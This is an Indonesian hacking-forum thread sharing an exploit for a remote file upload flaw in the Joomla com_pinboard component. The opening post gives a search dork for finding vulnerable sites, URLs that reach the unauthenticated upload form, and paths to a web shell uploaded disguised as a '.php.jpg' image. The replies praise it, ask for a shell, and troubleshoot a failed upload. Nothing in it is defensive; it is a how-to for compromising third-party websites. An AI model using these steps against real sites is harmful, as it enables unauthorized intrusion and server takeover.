Joomla Component - Remote File Upload Vulnerability

Pengunjung Jumlah posting : 38 Join date : 28.06.09

Joomla Component com_pinboard Remote File Upload Vulnerability

Dork:
inurl:com_pinboard

Exploit:
1. target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload
2. target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm

Show uploaded:
1. target.com/[path]/images/stories/pinboard/picture/[shell].php.jpg
2. target.com/[path]/strona/components/com_pinboard/pictures/[shell].php.jpg

Asisten LAB Jumlah posting : 135 Join date : 05.05.09

walah keren banget tuh om.....boleh donk mintya shell nya buat irc....

Admin Jumlah posting : 44 Join date : 29.04.09

mantab bos .. lanjut

Pengunjung Jumlah posting : 59 Join date : 21.06.09

nice share om
tapi kemarin nemu yang kayak gtu
terus saya upload file terus saya panggil filenya
koq yg keluar cuma URL z sih.?
bukan shel kita

Asisten LAB Jumlah posting : 135 Join date : 05.05.09

permisi nya kali om yan ngijinin kita akses tuh file

Pengunjung Jumlah posting : 59 Join date : 21.06.09

ouh gtu yah kk
thx yah penjelsannya